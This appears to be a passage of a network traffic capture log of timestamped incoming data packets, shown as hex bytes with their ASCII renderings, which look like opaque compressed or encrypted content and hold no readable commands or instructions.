                                                                                                                                                                                                                                    2022-10-04 05:10:05 UTC6983INData Raw: e2 17 2b 32 cb 51 7b bd ea 38 36 26 f2 89 5b bc 66 dd d4 57 5c b6 a6 71 eb 0d 38 5f 4b f5 07 ad 0c f5 a2 78 49 57 51 6f 0c 2f 6f d0 7c 61 9e de ac d5 9e 32 53 ef 6c a0 1c 1a 16 26 6e 6f 62 b2 a4 21 de 67 46 ca e7 53 ac ba 85 39 5c f8 fe 22 0f 13 65 57 f4 27 c6 67 f5 6e d3 81 1e b7 43 53 4a ea 7c d5 28 ef 3a 81 c1 bd 6b 09 69 b9 4d 46 b8 a7 18 69 5f 0d 4b 2a fa 71 79 42 4e 5e fc 3d 0f f7 18 61 a5 5b 22 8a ff 05 c2 ec bf 50 15 b9 9a da 84 e3 b7 6d 1c 79 28 3e 62 fc 95 1f 3b aa fb 2c 78 c3 53 3c 2f 9e e5 a4 f0 50 d0 96 21 7c 2f a7 0e 52 01 2f 94 e1 90 0c 5b 7a 24 7b 14 ad 64 32 05 08 a2 5d 41 e6 47 8d ce 3e 40 c2 16 a7 41 a1 fa cc ff b0 c5 c9 2f e9 c2 c2 cc 8a 90 b9 dc 27 3a f8 07 f1 1a 5b fe 85 f6 12 76 11 bb 3a bf 96 d0 62 87 9b 56 8d aa 6d 58 91 c5 4c 87
                                                                                                                                                                                                                                    Data Ascii: +2Q{86&[fW\q8_KxIWQo/o|a2Sl&nob!gFS9\"eW'gnCSJ|(:kiMFi_K*qyBN^=a["Pmy(>b;,xS</P!|/R/[z${d2]AG>@A/':[v:bVmXL
                                                                                                                                                                                                                                    2022-10-04 05:10:05 UTC6999INData Raw: 1e d5 68 4e 6a 4f 59 eb 80 81 b6 3f b5 00 8a 8f a7 13 83 7c b2 06 1b 0e 9c c8 9e 50 2b 51 a9 ab 25 bc 60 73 22 7f 7d 67 d0 41 64 68 99 b4 a6 eb ea 36 15 c5 06 88 02 af 3e 0e 6f ab 73 b4 7b e4 e8 94 fa fd 6c 41 e8 b7 76 e9 2f bc 35 2f 3f 9b a5 3e 71 e7 08 7a 1d 6f d1 88 76 d1 ce c2 cc d4 2e a8 f9 ee de da e2 7a ce b0 f4 90 a9 50 09 e5 90 bc a8 b5 76 65 a9 b0 7a 79 d3 e9 fa 85 c9 09 4d 50 48 9a 5b 6d 4d 00 04 f3 b6 d0 fe fd ed 7e 51 2e 05 88 bc 88 f8 00 10 e5 ee 9a 65 bd f7 fe e2 4e 4e be 6f 59 a5 92 17 19 16 2f c2 89 d6 94 6c 83 b9 dd cd a4 09 dd 4d 24 85 ed eb 6c 56 9b ec c3 24 a0 d3 95 0a ea c3 14 28 71 c5 6d 87 7a f6 c3 af 39 39 1e cd 26 27 fd 56 48 53 3d 60 c0 6a 45 97 b5 68 c4 d5 0e b7 5b 80 85 93 64 43 fe 74 b5 b1 7e 83 e5 3a 18 5f 61 31 66 68 b7 7d
                                                                                                                                                                                                                                    Data Ascii: hNjOY?|P+Q%`s"}gAdh6>os{lAv/5/?>qzov.zPvezyMPH[mM~Q.eNNoY/lM$lV$(qmz99&'VHS=`jEh[dCt~:_a1fh}
                                                                                                                                                                                                                                    2022-10-04 05:10:05 UTC7015INData Raw: 29 d9 ba cc 28 ef f1 9e 34 a2 a2 ce a5 6b 59 c0 d0 17 88 99 fb f4 cb c0 f6 b5 f1 e7 ac 69 57 7b 44 82 6e a9 d8 61 11 0e 82 75 26 39 de 18 7e b7 87 1c 8e 1f 26 39 c1 a0 46 9c 02 c8 13 f5 b2 51 0c 1f 0f 3f 37 9b 21 49 b6 15 60 83 da c7 93 74 d4 a6 53 da f2 f5 b4 b1 88 54 21 5e d2 4e 06 76 ac 16 55 2b f1 a2 f8 85 0e 46 ad 1c 0e cb 10 17 45 36 d1 9b 2e d1 02 48 b8 d5 b0 bd 4f 36 6e 5a 50 c7 6b 9e 6d 7f 7d ac 40 c3 42 62 ce be 7a 9a 3b ce a6 f7 04 f0 f7 bf 64 14 55 54 1a fe 64 4f 38 bc 9f 45 88 92 46 3e 30 a0 2b f0 c2 5e 28 8b fb f9 4e 7c 2a 2d 89 10 7f 7f 9d 46 b3 c1 3d e5 01 3f 97 ac e1 90 b5 fa 96 43 f8 7c f2 4d 68 07 e0 d0 18 b6 43 9e c2 a0 36 4d ac b9 1b 34 e0 96 f4 b8 35 78 5b df 13 28 02 4a 07 0b a4 12 80 80 dc 6d 9c 22 23 0a db 0b 31 06 ba 0e d1 47 c8
                                                                                                                                                                                                                                    Data Ascii: )(4kYiW{Dnau&9~&9FQ?7!I`tST!^NvU+FE6.HO6nZPkm}@Bbz;dUTdO8EF>0+^(N|*-F=?C|MhC6M45x[(Jm"#1G
                                                                                                                                                                                                                                    2022-10-04 05:10:05 UTC7031INData Raw: 72 d7 a6 d0 82 96 80 69 9e ca 01 8f ec 21 1c c2 7b 55 8a c0 e8 7a d8 9c 9b 23 20 15 3b 2a 25 76 43 d9 51 49 2e c6 a9 0a 62 17 27 a8 7d fb 9f 7a 74 66 7b 6a b9 bd 37 28 d2 5f ca bd a8 5d e1 04 bf 54 11 0d 58 19 d9 b4 2d c4 0c 81 3b dd 34 20 f0 2f 27 11 21 c3 b7 15 d3 0a fd e5 f3 73 67 e0 41 74 69 f7 d2 3b fe 45 d3 38 4f 84 1c fb b1 8a 05 15 e3 0d 2e 20 a3 c0 33 7e 37 c8 0f 80 55 46 24 ec 11 6d bb 82 c2 68 68 61 0f f5 21 1d 71 f3 e3 e5 ab a8 24 9a 66 93 12 bc c5 e6 2e 8c 55 e3 26 50 83 f2 91 1e 62 51 0e 20 4a cb b4 23 5b bc cd f3 76 76 0a 99 22 37 d2 a2 52 8b ac 96 d8 45 63 cc 51 f6 76 7e 1a bf b2 fb 94 bd 16 e9 7a d0 ff 1c 0d b0 b0 70 40 5c 30 70 de df 8f 9c 7c 47 d6 cc ec d4 f2 ee 4a 96 17 26 8e 53 14 07 d2 a7 6f a3 54 57 13 89 45 a0 a4 5f 71 a5 f1 cc 57
                                                                                                                                                                                                                                    Data Ascii: ri!{Uz# ;*%vCQI.b'}ztf{j7(_]TX-;4 /'!sgAti;E8O. 3~7UF$mhha!q$f.U&PbQ J#[vv"7REcQv~zp@\0p|GJ&SoTWE_qW
                                                                                                                                                                                                                                    2022-10-04 05:10:05 UTC7047INData Raw: d0 35 48 fa 3c b3 d0 74 e5 ec 37 12 a8 2a f3 78 fa 8e 0b b5 06 94 c8 b8 f6 ab 5f 5e 38 d4 a8 8b 12 72 2f e5 8a 5d 3f 6a d0 53 df f3 1c 48 aa ce 9a eb 67 47 97 24 69 66 75 31 c9 4d a3 f8 dd 94 4b 67 c0 c7 aa 2d 08 f9 7b af db 85 a4 eb d7 91 f9 77 26 62 c0 ce bd 22 c0 ca 07 80 b9 3e f2 9d eb 93 87 95 ca 98 09 b9 c3 61 b8 22 31 bc 92 d5 15 26 ca 01 bd 46 2b af 51 1c b0 5f 19 50 c0 94 17 8c bb cd 45 ec 69 01 00 63 7f a7 6e 86 33 07 4e c5 c2 bb 5b eb c9 34 67 fe 5a 86 05 e3 ca 85 bd 01 26 a4 f7 11 af f7 df d5 c1 42 e0 15 fc 71 f8 84 da 8e ef 34 9e 76 36 b3 ff 89 1b 2d b2 6e 2f 99 bc 25 3c b3 93 07 15 8c d1 fe c8 e1 55 a9 5f 7f 99 f3 f1 50 97 45 8f f3 50 7b 7d c9 9e 6b f8 07 db 94 d9 8d 58 68 ee fc 5c 04 c0 51 90 54 81 0a 46 3c 98 8e 84 1b ff 32 d9 4c 7b 42 e5
                                                                                                                                                                                                                                    Data Ascii: 5H<t7*x_^8r/]?jSHgG$ifu1MKg-{w&b">a"1&F+Q_PEicn3N[4gZ&Bq4v6-n/%<U_PEP{}kXh\QTF<2L{B
                                                                                                                                                                                                                                    2022-10-04 05:10:05 UTC7063INData Raw: 3c 91 59 f1 10 64 b6 7a 5f 24 db 6f d6 2f a8 68 d6 9a f8 27 f9 6f 78 d7 b5 a1 1c 76 0e 7c 7c 55 74 85 54 32 53 7a 20 78 f7 06 98 e5 96 95 e2 8b 24 5b 32 46 c1 3f 1b 92 2b 0c 65 df d7 30 ce 24 fd a6 e8 45 41 80 85 a0 3d 99 8c 65 c8 e0 48 80 c8 2f a6 93 31 d2 aa c7 f4 e3 3f fc 0c 2e 31 32 82 00 9f ce 18 06 2d 9a 0c 47 ac b1 bc 6d 9a 2d 4a 72 60 38 3c 8a e8 0e b5 23 12 32 81 a0 d7 01 50 b7 4e 95 0e 70 29 0b 75 d0 bf ae 2d c1 d5 06 0d 74 06 8a 27 2a 16 14 09 20 b0 3e ec a0 b6 c3 7c b6 26 64 2d 95 bc 43 8f c2 03 ed b7 db c3 0e 72 82 51 7d b1 66 24 24 db e5 bf d2 63 2d 9b b8 d5 27 0e dd 74 13 5b 0c 87 e7 5f 8c 86 ef 4a 8b 91 a3 0a 27 4c c1 ed eb a8 7e 49 a0 db 0a 5f 1c 07 36 40 e8 76 f9 22 d4 c1 f9 4d d7 7b f1 7f 00 45 38 ef 56 4f b6 f2 99 b5 d6 cd d0 59 4d 0d
                                                                                                                                                                                                                                    Data Ascii: <Ydz_$o/h'oxv||UtT2Sz x$[2F?+e0$EA=eH/1?.12-Gm-Jr`8<#2PNp)u-t'* >|&d-CrQ}f$$c-'t[_J'L~I_6@v"M{E8VOYM
                                                                                                                                                                                                                                    2022-10-04 05:10:05 UTC7079INData Raw: 96 f7 a0 f2 4b 94 7f 30 da f4 a5 58 f7 ee 9d 02 73 72 f6 f3 63 b4 54 9b 80 d3 8c 43 ea a2 af 08 eb 29 01 55 c6 25 95 13 c2 5f fc b6 a9 03 fe fb b1 41 f4 7d ce 99 da 0b 2a 17 cd ff 21 91 34 74 86 d6 ba 5f 9a fd e9 b4 11 15 c3 5f 6d 22 d8 92 8d 6d d0 29 5a 2f d3 1f f0 0a 38 44 de e2 05 22 ce 78 c6 2a c5 2d 0a ca 4e 8f bc e7 57 84 87 c1 da 7e 62 a6 01 ef 91 14 df a4 a8 a3 af 65 b9 2f 9d 52 cd 79 e2 66 be c6 69 9f 25 d9 9c 84 82 4e 2c 31 fe d6 5c 2d 5a be 21 43 ac 4d 71 3b 0c 96 ed ea f7 99 0c 54 4a 28 14 28 32 72 22 42 fa 93 87 11 b9 73 fd 11 e1 63 87 46 e4 7d f0 12 34 73 c7 d7 63 63 74 79 d4 ce 8b 48 1f 2c 6e 92 da 91 bf 20 69 e3 86 57 8a f7 ae 49 91 69 b0 47 0b 7d 53 7a 8a 29 f6 2d b0 71 c2 bc d2 ec a9 10 c8 e0 ae 70 e5 74 88 7f f8 4f f0 80 ac cc 19 00 07
                                                                                                                                                                                                                                    Data Ascii: K0XsrcTC)U%_A}*!4t__m"m)Z/8D"x*-NW~be/Ryfi%N,1\-Z!CMq;TJ((2r"BscF}4scctyH,n iWIiG}Sz)-qptO
                                                                                                                                                                                                                                    2022-10-04 05:10:05 UTC7095INData Raw: 9e 41 d8 2f e4 5e db 5d 0d b5 88 bf b5 f2 58 f9 6f 1a 88 f8 7e ed 65 7b 20 a7 1d 6b b9 71 f7 a1 46 60 34 3c 37 8c e9 b4 be 5f 0e a7 9a dd 58 82 da f7 7c f2 b2 b7 bb 0a 24 d5 69 5c d5 90 b8 ac d4 b4 23 ab cd d3 c2 a3 0b 9f 35 86 94 41 7b 2d 65 9b cf 25 b2 7f ef b4 8c 79 c4 86 92 a6 f9 3f f8 c2 84 88 47 00 a8 2e 56 cb 1b 9c 7c 21 1e c9 85 22 b6 13 4d 59 1e 3e 2e 91 3f 1d 96 b4 da 6a 19 82 99 6a 36 c4 f9 34 bc b3 d7 6d 46 61 56 69 1c fa 34 79 5d cb 1b 1d 0f 35 f7 7f b4 8a 8c c0 3c 53 98 55 a6 43 c6 55 e7 7e 00 a1 e8 11 24 f7 f0 25 6e d6 e1 e6 f7 ae b8 a8 53 71 2c f2 f8 d0 fa 35 7e be d0 94 80 85 10 dc db fc 90 d6 7e 43 ee 93 b1 41 55 3e 11 92 b1 e3 56 19 50 2b 30 fc ed 9b 06 3b c6 66 41 bd aa 41 e8 b8 d0 52 f6 d8 bc 47 95 e1 fc 40 69 d8 8b 8f 0f 2f c2 ab 6a
                                                                                                                                                                                                                                    Data Ascii: A/^]Xo~e{ kqF`4<7_X|$i\#5A{-e%y?G.V|!"MY>.?jj64mFaVi4y]5<SUCU~$%nSq,5~~CAU>VP+0;fAARG@i/j
                                                                                                                                                                                                                                    2022-10-04 05:10:05 UTC7111INData Raw: ab d6 2f ec ba 43 2b e5 69 f2 30 47 1e d6 89 1c 01 62 1f a0 d4 eb b9 3a 09 b9 b2 e6 8c ba 85 92 44 fd f0 dc 01 8b ab 3c 4f c1 76 2a 3c ac 1c fa 9c af 45 77 e1 f3 05 b4 b9 e3 a0 9d 2b 23 c8 3f e1 53 f7 e4 20 dc de 90 c1 3d 9a 24 08 d4 e5 7c 1f 14 ec 84 7f 77 bd 0d f0 e2 1f 57 5a bf c9 da 0d 0a a4 9a 04 d8 96 fa 3e 61 18 07 01 c0 91 93 1b 24 1b 9f 9e 5f 3b e9 ee 6f 83 72 74 ce c4 d4 d7 15 b5 1e 4a 52 f1 0b bb 28 f9 d4 16 88 88 11 18 04 7f 11 1d c7 01 bf da 31 98 17 1d 19 81 d2 e5 10 d1 8d 01 a6 69 10 02 0f 2e be f8 d8 ab f3 c9 07 99 17 9f 40 5f 4e cd c5 ba b9 73 47 ba 32 ad b6 f9 1a 2f a3 f3 22 8e 25 4e 90 5b a2 03 51 91 6b a8 50 22 b1 64 eb 8b f1 b3 28 1f f1 5b a4 4f 7d cf d4 df 03 48 b0 3b 4b 18 26 71 7f 36 14 c1 8e 26 36 71 0e e9 d2 de 3b 88 5d 45 ce 03
                                                                                                                                                                                                                                    Data Ascii: /C+i0Gb:D<Ov*<Ew+#?S =$|wWZ>a$_;ortJR(1i.@_NsG2/"%N[QkP"d([O}H;K&q6&6q;]E
                                                                                                                                                                                                                                    2022-10-04 05:10:05 UTC7127INData Raw: 17 99 3c 15 c6 fe 88 8a 8b 76 ac 34 db f8 d8 a2 14 04 95 f3 46 6d 72 7d c0 ed ac 4e 68 6e 78 cf e1 1a 47 1a 82 93 fc 27 e6 b3 8a ee ed 00 f6 9d 23 08 ef 3a ae 81 fe 78 46 e5 46 7b 05 c4 da 36 91 0e 36 5e d9 f7 d6 d3 86 fd 1e 36 36 42 11 57 10 c9 96 ce 3a 81 f2 5d 56 03 e0 f2 25 3f 3d 4a 53 22 c9 d2 81 2c cb 10 e1 d0 43 dc 86 01 09 42 30 0e ec b9 7a 59 a8 31 78 63 d6 0d 88 a9 f3 20 af 45 a4 27 c3 e2 09 a8 cd 55 42 e0 f6 11 ef 6e e4 a9 39 81 cb db 86 61 da 57 83 98 95 e2 7a a5 57 b0 d3 c7 e2 b9 7d d6 d7 59 59 82 6b bd 62 9f e9 0a e8 cf 67 c3 7b d1 dd 30 75 42 25 78 25 62 12 94 87 ce e6 d6 a2 fe 4c 10 f0 65 18 21 85 d9 32 d8 83 3c 27 f4 c9 ad 45 42 50 20 02 ae e1 d7 31 22 aa 53 38 f7 19 aa e6 ff ef 7f a6 d6 05 ad 89 61 40 f8 d2 ad ee cb b6 47 e5 dd 78 bf 0d
                                                                                                                                                                                                                                    Data Ascii: <v4Fmr}NhnxG'#:xFF{66^66BW:]V%?=JS",CB0zY1xc E'UBn9aWzW}YYkbg{0uB%x%bLe!2<'EBP 1"S8a@Gx
                                                                                                                                                                                                                                    2022-10-04 05:10:05 UTC7143INData Raw: 3e c9 3a 72 b7 d8 9a c0 76 ce 72 ff 96 2b 44 bf eb e3 4f 74 ea 3c bd 24 5d a3 ea af 48 ed 15 20 7f 94 b7 a9 a9 f8 52 8f 20 95 50 f4 7e 93 9e 49 e3 61 40 db b1 a4 14 42 9d 45 f9 ae b7 46 52 03 22 2b c0 e9 1a 6b b8 6e 31 a1 7b f3 91 85 0c 51 a5 7f a8 bf 1b 85 0b 67 40 01 b5 2e 92 bf a2 1d 4b 3d 1d 3c 37 01 52 62 fe ea 67 14 23 64 e0 4e 7c a3 1c 06 d5 fc 00 03 44 29 0b 53 8c 88 47 e1 dc 15 7d ae 33 c9 74 41 18 0c 4e 65 1e d5 60 a5 6f a7 ba 47 08 ff 3a 9a fb 87 f8 7f 18 47 fd 20 e0 49 da 81 f1 5c f4 68 75 dd fd de 92 2d 67 dc c1 f9 ca f9 f6 24 3f db 79 63 a3 69 82 20 14 d7 aa 1e a0 85 a4 b4 77 fe 4a 0e 24 13 01 73 be 52 04 87 c0 0b 39 ff f0 34 35 e2 11 11 ce e1 41 74 da c0 ca c5 70 f5 d3 a4 6c 11 d1 a8 75 ec 0f bf 0e 7a 14 c3 d1 2e ff 56 d4 11 c4 95 f4 31 3b
                                                                                                                                                                                                                                    Data Ascii: >:rvr+DOt<$]H R P~Ia@BEFR"+kn1{Qg@.K=<7Rbg#dN|D)SG}3tANe`oG:G I\hu-g$?yci wJ$sR945Atpluz.V1;
                                                                                                                                                                                                                                    2022-10-04 05:10:05 UTC7159INData Raw: 0c 7d 3c 7f 93 fe 58 1a 08 0b 97 ef 4e df bb 66 98 07 d4 73 0d a8 10 2e ec 66 55 82 83 84 85 67 f8 a3 15 80 90 77 8e c2 59 ff c6 65 77 3b ef fb 88 e7 c4 c7 59 d7 ec d7 d6 60 01 4e 18 d6 0d 5a f3 51 a4 be 12 15 25 38 c7 35 46 99 a2 c1 4f 6b d8 e8 40 23 c4 d0 fa 1d 33 77 0e 89 1e e8 f0 7a 48 c5 d7 8f 04 ae 4e d4 71 f2 22 99 ab 75 f4 3e 0b 7f 86 a4 99 a6 4f 5a 5c c3 af a2 d1 af 61 bc 26 89 53 0a cd 1c 5e bc 08 b4 07 6b 28 80 19 83 60 9c f1 e2 d0 90 eb 09 45 d2 4c b0 6c 02 ac 3d 26 a9 f2 fb 26 31 ce 98 37 c1 2e a5 8a e9 6f 83 d4 c8 02 82 fe 59 79 7b 0c f7 40 7b 0a 16 e0 1c f8 41 83 8e 98 0f e6 62 4a 82 11 95 a1 ce 8d b5 fd 64 fb f5 e6 e3 7f 80 c0 d4 3c f0 4a 8a 22 3f 19 38 f1 24 8d 09 7a 9e 00 8b 7e 61 c0 d4 00 75 d1 16 81 12 6c fb aa 41 6b 95 1f 47 93 fc 8d
                                                                                                                                                                                                                                    Data Ascii: }<XNfs.fUgwYew;Y`NZQ%85FOk@#3wzHNq"u>OZ\a&S^k(`ELl=&&17.oYy{@{AbJd<J"?8$z~aulAkG
                                                                                                                                                                                                                                    2022-10-04 05:10:05 UTC7175INData Raw: 36 82 f8 8b ef a1 ca a1 2a a2 31 0a af ae da 97 92 82 7f a1 89 6f 23 06 40 7b 0e 90 4e 85 4e f0 1d 50 eb 51 11 c5 6f b5 69 33 ef 32 c9 d3 5a 11 1f 8e 20 09 04 81 7a 2a 90 39 b5 6d b2 06 75 e9 4b 76 c9 47 59 77 d4 e5 e6 57 3e 0a e0 b1 8e f4 6a 2a d8 84 d4 6f 11 02 69 5c e9 aa ca 8c e0 96 ba 90 81 1e 98 42 14 a1 08 8d 26 93 ee cc 91 b7 a5 01 78 49 86 97 13 a5 49 4c 59 b6 27 25 09 6e 1c 21 fe 1d 88 c8 f8 81 a3 77 53 b1 4d 8a 00 86 05 12 b4 24 1f d9 03 ef 83 80 c3 8e 98 69 8c a1 9e ad e5 92 ac 3e fc 30 2d 22 e0 98 e7 ae d3 24 ec fb ce b2 59 fb f7 af e9 72 d6 d1 f1 49 fc fe 14 8a b6 b5 c8 6e c4 c1 36 70 35 4d db 02 19 2a 91 41 bf d0 f0 44 a3 20 cc 2d 01 06 bd ef 2d 43 9d 97 ed 6d ca 12 2f 00 36 04 24 b8 24 fe 08 c6 5e d2 6c 36 cb f8 a5 11 87 dd 07 73 bf 06 a2
                                                                                                                                                                                                                                    Data Ascii: 6*1o#@{NNPQoi32Z z*9muKvGYwW>j*oi\B&xIILY'%n!wSM$i>0-"$YrIn6p5M*AD --Cm/6$$^l6s
                                                                                                                                                                                                                                    2022-10-04 05:10:05 UTC7191INData Raw: 70 9c 35 39 ee f9 fa 12 46 22 19 95 6d 8c 73 75 95 de 84 53 be 8b 0d bc 23 80 96 b5 b5 06 c8 af 31 3a cc 6e a8 27 7e 43 dd 99 1f a0 1e 12 e1 1f 76 1c 39 fe 75 90 52 ff 40 59 fc 3a f4 82 fc 06 bd 46 4a c8 d4 6a 94 ba 17 e4 7a a1 06 69 f6 c6 b2 4a bd 7b 4a 77 a8 13 24 39 7f 79 f1 6b 97 04 15 09 44 81 69 e6 60 93 9a 7f b7 34 0d f8 ce 34 2a 02 c5 3e 1c c4 6d 92 c4 f5 cd 47 2f 4f c6 15 8b 24 5d 16 4b 9a 71 e0 51 d4 f5 8f 2f 60 88 15 6c 91 d2 85 e8 02 a4 e7 1d 3d ca 0b a8 1a a0 87 32 bb 91 42 56 9b a3 be 5f 3c b1 40 5d 19 29 62 00 fe 48 51 bb 59 09 ce 0b c4 26 b1 f7 66 40 a0 b2 78 46 fb d4 cb da f0 76 49 e1 5b e8 60 c7 69 48 b5 59 7f b4 8b f8 4d ee 63 cf c4 8f 52 33 3b 56 a7 46 94 b8 f2 ce ac 8a 3c 6e 4e 1c 9b ff fe 21 0f 1d b0 32 a0 40 33 90 67 63 d7 2b 81 99
                                                                                                                                                                                                                                    Data Ascii: p59F"msuS#1:n'~Cv9uR@Y:FJjziJ{Jw$9ykDi`44*>mG/O$]KqQ/`l=2BV_<@])bHQY&f@xFvI[`iHYMcR3;VF<nN!2@3gc+
                                                                                                                                                                                                                                    2022-10-04 05:10:05 UTC7207INData Raw: 11 a0 b5 fe f1 c0 66 d1 ed 3a fb 05 b5 5c 09 77 7d f1 e1 d0 e3 4d 59 be 70 de 51 63 11 58 a4 67 ca aa 39 dd ff d6 54 33 8c 30 ec 2f 6b 8e f3 27 67 26 7f 71 7f 61 3e aa 7e 15 c2 47 1f 6a 96 e7 4b 79 20 88 f6 cd 15 e6 e0 2e 31 d1 df 6e 33 14 0c b7 23 8b 4b 7d 49 fb 4f 98 30 14 5a ab d9 17 16 ce e6 5f 1f cd 95 7f ac b4 d9 89 61 40 f4 bf 48 e8 57 7b 57 b3 84 0d ae 0b 35 18 98 9c ea 08 41 5b 3a a3 3c 96 19 b0 d6 1f 8b 5f 19 61 ff 04 0e 8d 3d ed e4 b5 89 6b 2e eb ab 01 39 07 b2 c2 16 60 e9 87 8d ed 1a d3 25 bb f2 c4 ef 3d 6a 6f 1c 5d 7a 89 8c 63 f0 27 f7 d3 31 e9 b5 49 69 53 7b 42 f2 05 ed d6 72 1a 61 53 fe b3 de 49 68 bd 0d d6 bd 73 e1 69 fe 2b b9 61 1f d6 d8 05 13 95 f4 92 02 8d 42 6f 6c 72 15 96 e8 b6 ff 68 f6 5f 87 7c b7 f8 f3 c3 c4 00 99 12 bb f0 69 46 7b
                                                                                                                                                                                                                                    Data Ascii: f:\w}MYpQcXg9T30/k'g&qa>~GjKy .1n3#K}IO0Z_a@HW{W5A[:<_a=k.9`%=jo]zc'1IiS{BraSIhsi+aBolrh_|iF{
                                                                                                                                                                                                                                    2022-10-04 05:10:05 UTC7223INData Raw: 2b d6 40 ec 59 26 e5 d3 f2 32 83 8c a1 ae 33 01 f0 80 b8 b6 6b 51 66 d2 f3 1f 5b 23 5d 97 5d d4 81 71 d1 a4 2e 21 93 4c dd 77 69 a1 54 09 bb a4 fe 95 c7 a6 1d 8f 0a 7b 66 32 36 7f 33 65 d7 92 2c 75 30 b8 38 81 2d 41 21 a9 6a 1d 0a 2c ad ea 0d b6 e8 cb f4 50 f9 80 b5 71 c8 bd 23 0c a9 37 a4 ad 6d f3 e9 8c 0c 7e 53 e0 07 17 f2 35 4d b1 91 50 52 f1 31 9d 72 c0 79 e9 28 d4 9c 49 17 2a 34 1e a0 f8 4b 28 ac c9 19 0e c6 13 7d 87 5c 8e 35 96 93 68 86 87 3e 82 08 e6 fe d9 05 c0 7d b5 ed ca d5 a3 7d 90 30 a5 80 35 97 c2 85 f5 db 8d 0e 3d 95 9b af 07 30 40 04 dd d6 7e 8e cf fd 75 42 d0 b8 86 8b fe 2f 09 76 01 7b 50 d3 90 7e 7a ec ce 1b 72 14 7b 5d 2f a9 9e 71 d5 2e cb 9e 18 9c 11 e7 6c 0c f3 da a5 fa 7c 29 37 02 87 56 7d e1 b2 d9 69 2f 32 c2 33 92 9b a5 4e 95 47 34
                                                                                                                                                                                                                                    Data Ascii: +@Y&23kQf[#]]q.!LwiT{f263e,u08-A!j,Pq#7m~S5MPR1ry(I*4K(}\5h>}}05=0@~uB/v{P~zr{]/q.l|)7V}i/23NG4
                                                                                                                                                                                                                                    2022-10-04 05:10:05 UTC7239INData Raw: c3 51 f3 4a 14 52 94 0b 2d bf 51 7f ae e2 56 9d e5 0b 2f b3 cc 03 23 a8 6c 57 5d 9c 8a ed a8 00 cc e9 26 4c d8 54 51 a9 17 13 3d 62 1f 9d ba 49 bb 91 88 11 7e c7 0f 01 e8 e5 a3 2c 13 c6 69 54 0f 53 a8 62 91 5d 51 98 02 cc c4 35 5d 0b 82 b3 4e 0c 98 a1 30 99 17 be ff be f9 91 c9 3a 0f a6 c8 a8 a5 72 2a 9b f6 49 34 6a 78 87 cd 00 bf a3 68 60 60 2d 74 2d 3a 79 0c 09 f6 7b 7e 44 6f ab 89 e9 70 6f 82 eb f6 90 ae fd 55 20 be 0b 64 4f af 69 e6 46 06 05 41 f5 52 a9 9c 4c 95 46 b8 ad eb 32 67 32 3c 55 a0 33 2a 5d ab 2b a0 70 84 98 7f ea 37 35 08 e5 74 52 14 8b d9 7f 0d 9d 00 48 66 6c ad c1 de 48 2a 64 c1 3f 1a ec 9a ba f4 f0 72 f1 b0 24 b0 56 75 59 b0 74 6e dd e4 0d f4 ba 2b ea 82 e2 b5 58 1f 30 cf d4 58 9c 8f cb 68 2a 08 c4 87 58 9b 48 5e 2b 40 81 34 bc 70 06 63
                                                                                                                                                                                                                                    Data Ascii: QJR-QV/#lW]&LTQ=bI~,iTSb]Q5]N0:r*I4jxh``-t-:y{~DopoU dOiFARLF2g2<U3*]+p75tRHflH*d?r$VuYtn+X0Xh*XH^+@4pc
                                                                                                                                                                                                                                    2022-10-04 05:10:05 UTC7255INData Raw: 01 f2 ca 50 e8 8a 82 6f 29 3f 05 24 05 a7 13 27 65 e3 8d 9d 00 72 a8 e9 18 5b d5 b6 d7 8c fb ac a5 4b 9a df b4 3f 56 7e b7 5d 68 51 ae 21 67 64 31 55 40 62 59 19 35 e6 f0 11 99 f5 32 10 66 4c 86 26 94 49 24 7d 9c c4 b3 88 2f 1b 19 33 17 de 06 87 7a ab a6 fc 06 98 65 90 75 69 16 33 94 9a 44 84 d9 4b 4c ad 23 8c f0 a4 bc fc cf 09 87 a7 c9 20 58 82 6c 07 54 c2 b9 e9 83 5d 85 4b a9 4f a9 bb e6 36 78 61 70 87 17 07 5c ee 8c 37 ab 43 23 f2 66 ef 12 a6 0e 8d 82 a5 1b 15 ee 52 96 23 72 3e 05 f2 e7 b9 c1 c7 6c a4 5d 23 6c 53 1c d4 7d 21 ff 8e 7f eb aa e9 23 99 81 d2 c7 0c 70 6e 5c 7c 41 9c fa 28 69 ad 6a 90 0e 2b 1d ca df 84 26 ee 55 ad 99 55 cf b1 ee 9f c8 35 52 d3 a5 b4 b0 63 4b f1 d5 a5 a7 34 62 c6 b7 8b 0f a1 fd 33 d0 83 62 59 65 25 ee 99 9d dd 4c 38 65 c1 4b
                                                                                                                                                                                                                                    Data Ascii: Po)?$'er[K?V~]hQ!gd1U@bY52fL&I$}/3zeui3DKL# XlT]KO6xap\7C#fR#r>l]#lS}!#pn\|A(ij+&UU5RcK4b3bYe%L8eK
                                                                                                                                                                                                                                    2022-10-04 05:10:05 UTC7271INData Raw: cf fa f2 ef 8a ef 59 d6 9e bb c0 74 ce ed 93 e4 06 e6 74 33 57 24 45 d9 44 e3 b1 12 bf f3 7e f9 39 b9 42 6e 4d a6 dc 3a f5 ce f7 1d 20 07 17 ac de ed e3 d5 90 e5 1f 4e 30 d6 a3 9c d9 19 48 d1 3a f5 ef 24 c3 a6 67 74 10 e2 ad 5e 5a 3c 46 92 86 78 c1 4f a1 28 44 e8 52 3d 1c 04 b4 ac 74 39 25 6a b4 3b 52 1a c9 4c 34 c1 3e 50 48 2a 7b 31 af f4 94 b9 ed 60 9d 01 e6 91 45 b6 c8 aa b8 e9 5c df 52 21 fe 3e 77 3f ea c5 2f 71 7d bc ee b9 0f b8 9a 26 5b e6 88 04 c3 00 fa f0 e8 40 ad 63 c7 87 31 01 0e 20 3b a0 ef 4e 05 04 bd c2 64 16 f1 dd eb 2e 77 e4 c5 ab a2 be aa 6e 2a 42 c7 f2 78 92 75 1e 7a 77 5b 77 c6 93 ad a7 f5 13 5a ea b4 b5 91 b1 92 ee a0 90 8f bf e7 4e a8 7a 5c 11 d7 f9 d2 fa 8a a0 c6 c9 af d1 28 2d b3 ff 00 3e 78 6f 75 47 28 34 fb 3d f3 c6 88 8e 31 04 64
                                                                                                                                                                                                                                    Data Ascii: Ytt3W$ED~9BnM: N0H:$gt^Z<FxO(DR=t9%j;RL4>PH*{1`E\R!>w?/q}&[@c1 ;Nd.wn*Bxuzw[wZNz\(->xouG(4=1d
